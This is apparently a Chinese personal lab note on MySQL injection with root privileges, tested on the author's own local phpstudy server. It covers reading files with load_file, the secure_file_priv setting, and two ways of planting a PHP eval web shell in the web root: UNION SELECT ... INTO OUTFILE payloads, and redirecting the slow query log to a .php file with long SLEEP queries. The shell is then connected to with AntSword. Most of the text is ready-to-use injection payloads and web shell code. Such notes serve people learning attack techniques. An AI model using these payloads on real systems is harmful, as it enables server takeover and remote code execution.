root高权限读写注入

load_file 读取文件

 

大姐我真是整了半天都是nullnullnull缝子

结果看了半天这个my.ini是被隐藏的大哥

load_file()读取文件结果为null_mysql load_file返回null解决办法_黑小薛的博客-CSDN博客 

终于读出来了

此时参数值系统变量 secure_file_priv已经被修改

原本此处变量值为 NULL，即没设置允许操作的目录，所以没法导出到文件。

这个变量就可以用来限制操作路径

into_outfile 写入文件

?param=0' union select 1,2,3,4,'a' into outfile 'e:/2.txt'--+

我们可以看到2.txt被写入

我们可以写入一句话木马

?param=0' union select 1,2,3,4,'<?php eval($_POST[a]);?>' into outfile 'D:/phpstudy_pro/WWW/c.php'--+

先检查一下是否上传成功

用蚁剑发现连接成功了v

太搞笑了连接自己

 

那么如果把my.ini内的参数secure_file_priv设置在c盘目录下

secure_file_priv=c:/

我们可以发现我们就只能在c盘进行操作

mysql写马

set global slow_query_log=1;

set global slow_query_log_file='D:\\phpstudy_pro\\WWW\d.php'

D:\\phpstudy_pro\\WWW\d.php---------》shell路径

可以看到有了d.php

select '<?php eval($ POST[a])?>' or SLEEP(1);

但是！！！

我发现如果sleep的少，并不会记录到日志中去

要sleep的久一点

Mysql注入写Shell读文件总结 - FreeBuf网络安全行业门户

select "<?php eval($_POST[aaaaaa]);?>" or sleep(11);

 

可以看一下我们的日志d.php

因为尝试了很多次。。所以有很多

我们可以发现都是sleep(11)的被记录了

蚁剑连一下看看